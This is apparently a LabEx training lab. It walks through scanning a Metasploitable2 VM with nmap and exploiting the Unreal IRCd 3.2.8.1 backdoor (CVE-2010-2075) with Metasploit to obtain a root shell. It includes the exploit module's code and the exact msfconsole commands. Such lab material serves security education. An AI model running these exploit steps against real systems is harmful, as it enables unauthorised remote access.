LabEx
Log InJoin Free

Exploit Unreal IRCd Vulnerability with Nmap and Metasploit

NmapBeginner
Practice Now

Introduction

In this lab, we will learn how to exploit the Unreal IRCd service on the Metasploitable2 target machine hosted on the LabEx platform. We will start by gaining an understanding of the vulnerability in the Unreal IRCd service and then perform a vulnerability scan using Nmap. After identifying the vulnerable service, we will leverage the Metasploit framework to exploit the vulnerability and gain a remote shell on the target machine. Finally, we will validate our successful exploitation by executing commands on the compromised system.

Understand the Unreal IRCd Vulnerability and Start the Experiment Environment

The Unreal IRCd 3.2.8.1 version contains a backdoor vulnerability (CVE-2010-2075) that allows remote attackers to execute arbitrary code on the affected system. The vulnerability exists in the DEBUG3_DOLOG_SYSTEM macro, which includes external malicious code that can be leveraged by an attacker.

Relevant information:

The Metasploit module for exploiting this vulnerability:

Here's a brief overview of the Metasploit module:

## Require necessary modules
require 'msf/core'

## Define the Metasploit module class
class MetasploitModule < Msf::Exploit::Remote
  ## Module initialization with details like name, description, author, references, etc.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
      'Description'    => %q{
          This module exploits a malicious backdoor that was added to the
        Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
        Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
      },
      ## ... (omitted for brevity)
    ))

    ## Set default options
    register_options(
      [
        Opt::RPORT(6667)
      ], self.class)
  end

  ## Exploit method
  def exploit
    ## Connect to the remote service
    connect

    ## Print banner information
    print_status("Connected to #{rhost}:#{rport}...")
    banner = sock.get_once(-1, 30)
    banner.to_s.split("\n").each do |line|
      print_line("    #{line}")
    end

    ## Send the backdoor command
    print_status("Sending backdoor command...")
    sock.put("AB;" + payload.encoded + "\n")

    ## Wait for session creation or timeout
    1.upto(120) do
      break if session_created?
      select(nil, nil, nil, 0.25)
      handler()
    end
    disconnect
  end
end

Now you will start the attack machine (Kali Linux container) and the target machine (Metasploitable2 virtual machine) for the experiment.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2

Wait for the target machine to start, it may take 1-3 minutes.

  1. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
  1. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

Perform Vulnerability Scanning

In this step, we will perform vulnerability scanning on the target machine to identify open ports and services running on those ports. We will use the powerful Nmap (Network Mapper) tool for this purpose.

  1. Launch the Metasploit console in the Kali Linux container:
cd ~
msfconsole
  1. Within the Metasploit console, use the nmap command to scan the target machine:
nmap -sV -T4 192.168.122.102

The -sV option enables version detection for the open ports, and -T4 sets the timing policy to an aggressive level (1-5, higher is faster).

The output should show an open port 6667 running the unreal ircd service.

Press Ctrl+D to quit the Metasploit console then start the inspection

Exploit the Unreal IRCd Vulnerability

Now that we have identified the vulnerable Unreal IRCd service running on port 6667, we can proceed with exploiting it using the Metasploit framework.

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
  1. In the Metasploit console, search for the unreal_ircd_3281_backdoor module:
search unreal_ircd_3281_backdoor
  1. Load the module:
use exploit/unix/irc/unreal_ircd_3281_backdoor
  1. Set the target host:
set RHOST 192.168.122.102
  1. Run the exploit:
exploit

If the exploit is successful, you should obtain a remote shell on the target machine.

Press Ctrl+D to quit the Metasploit console then start the inspection

Validate the Exploitation

To validate that the exploitation was successful, we can execute commands on the remote shell obtained in the previous step.

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
  1. Check the current user with the whoami command:
whoami
  1. Check the hostname with the hostname command:
hostname
  1. Check the IP address with the ifconfig command:
ifconfig

If the output shows root as the current user, metasploitable as the hostname, and the IP address matches the target machine (192.168.122.102), it confirms that the exploitation was successful, and you have gained complete control over the target system.

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, we learned about the Unreal IRCd vulnerability and how to exploit it using the Metasploit framework. We started by understanding the vulnerability and its impact, then performed vulnerability scanning to identify the vulnerable service. After finding the Unreal IRCd service running on port 6667, we used the appropriate Metasploit module to exploit the vulnerability and gain remote access to the target machine. Finally, we validated our successful exploitation by executing commands on the compromised system. This lab provided hands-on experience in vulnerability analysis, exploitation, and post-exploitation validation, which are essential skills for ethical hackers and cybersecurity professionals.

Related Nmap Courses
Nmap for Beginners

Nmap for Beginners

cybersecuritynmaplinux
Hands-On Network Scanning with Nmap on Linux

Hands-On Network Scanning with Nmap on Linux

cybersecuritynmaplinux
Nmap Scanning and Telnet Access

Nmap Scanning and Telnet Access

cybersecuritynmaplinux